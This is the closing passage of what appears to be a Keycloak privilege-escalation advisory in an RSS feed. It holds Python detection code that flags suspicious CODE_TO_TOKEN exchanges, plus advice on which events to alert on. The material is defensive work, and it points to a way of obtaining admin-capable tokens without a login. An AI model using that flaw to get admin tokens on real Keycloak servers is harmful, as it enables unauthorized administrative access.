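        if ev["type"] != "CODE_TO_TOKEN":
            continue
        code = ev.get("details", {}).get("code_id")
        base = {"time": ev["time"], "code_id": code, "clientId": ev.get("clientId"),
                "userId": ev.get("userId"), "ip": ev.get("ipAddress")}
        login = logins.get(code)
        if login is None:
            findings.append({**base, "reason": "code exchanged without a LOGIN that issued it"})
        else:
            age = ev["time"] - login["time"]
            if age < 0 or age > lifespan_ms:
                findings.append({**base, "reason": "exchange outside code lifespan"})
            issued_to = (login.get("clientId"), login.get("userId"), login.get("sessionId"))
            redeemed_by = (ev.get("clientId"), ev.get("userId"), ev.get("sessionId"))
            if issued_to != redeemed_by:
                findings.append({**base, "reason": "client/user/session differ from issuing LOGIN"})
        if code in seen:
            findings.append({**base, "reason": "code exchanged more than once"})
        seen.add(code)
    return findings


if __name__ == "__main__":
    for finding in correlate_code_exchanges(SAMPLE_EVENTS):
        print(finding)
```

<p>The second reason is the one to page on: a <code>CODE_TO_TOKEN</code> for <code>security-admin-console</code> or <code>admin-cli</code> with no issuing LOGIN is exactly the admin-capable token the advisory describes. Keycloak only records these events if the realm&rsquo;s event listener is enabled and <code>CODE_TO_TOKEN</code> is among the saved event types, so check that configuration before relying on the correlation.</p>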
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>keycloak</category><category>privilege-escalation</category><category>authorization</category></item></channel></rss>